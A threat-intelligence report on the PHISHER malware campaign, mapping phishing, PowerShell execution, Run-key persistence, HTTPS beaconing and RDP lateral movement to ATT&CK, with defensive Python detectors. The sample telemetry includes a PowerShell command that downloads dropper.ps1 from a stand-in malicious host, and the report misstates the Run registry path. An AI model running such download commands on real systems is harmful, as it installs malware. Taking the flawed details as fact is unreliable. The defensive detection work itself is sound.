Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The recent PHISHER malware campaign demonstrates advanced tactics for initial access through social engineering.
- Our analysis revealed the use of T1059.001 – Command and Scripting Interpreter: PowerShell for execution of the payload and persistence mechanisms.
- Threat actors employed T1071.001 – Application Layer Protocol: Web Protocols for command and control communications, leveraging HTTPS traffic.
Executive Summary
During our investigation of the PHISHER malware campaign, we identified a sophisticated approach that combines social engineering for initial access and several techniques from the MITRE ATT&CK framework to achieve its objectives. The malware primarily targets corporate environments, utilizing a blend of phishing emails and malicious attachments to install itself on victim machines. This analysis will detail the methodologies employed by the actor, from initial infection through to lateral movement and data exfiltration.
Initial Access
Initial access was typically achieved through convincing phishing emails that exploited specific vulnerabilities in common office software. The actor used email subjects promising enticing offers or critical updates to compel users to open attachments and enable macros. The attachments were typically macro-enabled Word documents, meticulously designed to appear legitimate. Upon execution, the macros triggered a PowerShell command that downloaded the initial stage of the malware from a remote server. The download URL, such as http://malicious-domain.com/dropper.ps1, employed domain generation algorithm (DGA) tactics so that the domain it resolved through varied over time, making detection challenging.
Execution & Persistence
Once the dropper had executed, it launched the primary payload, which we identified as PHISHER. Upon execution, it created several artifacts on the system to ensure persistence. Specifically, we noted registry modifications under HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run, where the malware inserted a new value named PhisherService pointing to its executable, ensuring it would relaunch at every user login. During our analysis, we also found that the malware employed T1059.001 – Command and Scripting Interpreter: PowerShell as its primary execution method, allowing the actor to further obfuscate commands and scripts during execution.
Command and Control
Communication with the command and control (C2) infrastructure was predominantly achieved through T1071.001 – Application Layer Protocol: Web Protocols. The traffic was primarily HTTPS, which provided an additional layer of concealment, and the C2 server presented a certificate that lent the connection an appearance of legitimacy, further complicating detection. Regular beacons were observed every 30 minutes, with requests such as GET /query?token=xyz123 used to retrieve additional commands or exfiltrate stolen data. The actor also employed fast-flux techniques, so that the IP addresses the C2 domains resolved to changed continuously, which hampered established detection methodologies.
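The fixed 30-minute beacon interval described above is itself a detectable signal. The following is an added example, not code from the original report: it parses constructed proxy log lines (hostnames, workstation names and timestamps are all assumed) and flags source/destination pairs whose inter-request timing clusters tightly around the expected interval, counting how many of those requests hit the /query?token= path.

```python
import re
import statistics
from datetime import datetime

# Constructed proxy log lines (not from the report): ws-017 beacons every
# 30 minutes to the C2 path described above; ws-022 browses normally.
SAMPLE_PROXY_LOG = """\
2024-05-01T09:00:02Z ws-017 GET c2.example-placeholder.net /query?token=xyz123
2024-05-01T09:01:10Z ws-022 GET www.example.com /index.html
2024-05-01T09:30:01Z ws-017 GET c2.example-placeholder.net /query?token=xyz123
2024-05-01T09:47:44Z ws-022 GET www.example.com /news
2024-05-01T10:00:03Z ws-017 GET c2.example-placeholder.net /query?token=xyz123
2024-05-01T10:30:00Z ws-017 GET c2.example-placeholder.net /query?token=xyz123
2024-05-01T10:31:15Z ws-022 GET www.example.com /about
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+)$")

def parse_log(text):
    """Yield (timestamp, src_host, dest_host, uri) tuples; skip malformed lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, src, _method, dest, uri = m.groups()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dest, uri

def find_beacons(text, expected_interval=1800, tolerance=60, min_hits=3):
    """Return (src, dest) pairs whose request timing looks like a fixed-interval beacon."""
    by_pair = {}
    for ts, src, dest, uri in parse_log(text):
        by_pair.setdefault((src, dest), []).append((ts, uri))
    flagged = []
    for (src, dest), events in by_pair.items():
        if len(events) < min_hits:
            continue
        events.sort()
        deltas = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        median = statistics.median(deltas)            # typical gap between requests
        jitter = max(abs(d - median) for d in deltas)  # how far any gap strays from it
        token_hits = sum("/query?token=" in uri for _, uri in events)
        if abs(median - expected_interval) <= tolerance and jitter <= tolerance:
            flagged.append({"src": src, "dest": dest, "median_interval_s": median,
                            "token_requests": token_hits})
    return flagged
```

Because the actor used fast-flux DNS, keying on the destination hostname rather than the resolved IP keeps the beacon series intact across address changes.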
Lateral Movement & Discovery
Our investigation traced several lateral movement attempts using T1021.001 – Remote Services: Remote Desktop Protocol. Here, PHISHER leveraged harvested credentials to access shared drives across the network. Using tools like Mimikatz, presumably deployed alongside the initial payload, the malware captured plaintext credentials from memory. A notable indicator of compromise (IOC) was a suspicious executable in the %APPDATA%\Local\Temp directory, which had direct access to Active Directory and was tied to privilege escalation attempts. The targeted machines showed an escalation to domain admin accounts, heightening the severity of the incident.
Impact & Objectives
The objectives of the PHISHER campaign appeared to be twofold: data exfiltration and persistent network access. Our analysis revealed multiple instances of sensitive data being aggregated and prepared for exfiltration shortly after the malware's installation, suggesting a clear intent to harvest proprietary information. Data governed by internal policies on user privacy and security was placed in compressed files at paths such as C:\Users\Public\Documents\stolen_data.zip for potential transfer. Additionally, the actor's end goal appeared to be establishing footholds on multiple systems across the target's infrastructure, allowing for repeat attacks.
MITRE ATT&CK Mapping
- T1071.001 – Application Layer Protocol: Web Protocols: Used for C2 communication.
- T1059.001 – Command and Scripting Interpreter: PowerShell: Execution of commands and payloads.
- T1021.001 – Remote Services: Remote Desktop Protocol: For lateral movement and accessing additional machines.
Detection Opportunities
- Monitor for suspicious PowerShell execution, especially involving encoded commands or downloads from known C2 infrastructure.
- Implement anomaly detection on outbound traffic for unusual HTTPS requests and DNS queries indicating fast-flux DNS behavior.
- Establish heuristics for abnormal registry modifications, particularly within the HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run key.
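The PowerShell and registry detection opportunities above can be expressed as simple rules over endpoint telemetry. The following is an added example, not code from the original report: it runs three rules over constructed Sysmon-like events (process creation and registry value set). The workstation names, file paths and encoded-command payload are assumed; the download host and the PhisherService value name come from the report, and the Run key path is assumed to be logged as HKCU\...\CurrentVersion\Run.

```python
import re
from urllib.parse import urlparse

# Constructed endpoint telemetry in a simplified Sysmon-like shape (not from the
# report): event 1 = process creation, event 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "host": "ws-017", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QUJDRA=="},
    {"id": 1, "host": "ws-017", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -Command Invoke-WebRequest -Uri http://malicious-domain.com/dropper.ps1"},
    {"id": 1, "host": "ws-022", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"id": 13, "host": "ws-017",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\PhisherService",
     "details": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svc.exe"},
    {"id": 13, "host": "ws-022",
     "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "details": "C:\\Users\\jdoe\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"},
]

KNOWN_C2_HOSTS = {"malicious-domain.com"}  # download host named in the report
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# -e / -ec / -enc / -EncodedCommand followed by whitespace; -ExecutionPolicy does not match
ENCODED_RE = re.compile(r"\s-e(c|nc|ncodedcommand)?\s", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\(?P<value>[^\\]+)$", re.I)

def check_event(ev):
    """Return the list of rule names the event triggers (empty if nothing matched)."""
    hits = []
    if ev["id"] == 1 and ev["image"].lower().endswith("powershell.exe"):
        if ENCODED_RE.search(ev["cmdline"]):
            hits.append("ps_encoded_command")
        for url in URL_RE.findall(ev["cmdline"]):
            if urlparse(url).hostname in KNOWN_C2_HOSTS:
                hits.append("ps_download_known_c2")
    elif ev["id"] == 13:
        m = RUN_KEY_RE.search(ev["target"])
        if m and m.group("value").lower() == "phisherservice":
            hits.append("run_key_phisher_ioc")       # campaign-specific value name
        if m and "\\temp\\" in ev["details"].lower():
            hits.append("run_key_temp_binary")       # autostart pointing into a Temp dir
    return hits

def scan(events):
    """Return (host, rule) pairs for every rule hit across the telemetry."""
    return [(ev["host"], rule) for ev in events for rule in check_event(ev)]
```

The Temp-directory rule is the more durable of the two registry checks, since a renamed value name would evade the IOC match but an autostart entry pointing into a user temp folder remains unusual for legitimate software.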
Analyst Notes
The PHISHER malware campaign illustrates the continuous evolution of threat actor tactics, emphasizing the importance of user awareness and robust network defenses. The ability to detect and respond effectively hinges on a multi-layered approach to monitoring user behavior and network traffic patterns. As threat landscapes continue to mature, understanding these TTPs will be pivotal in proactive defense strategies.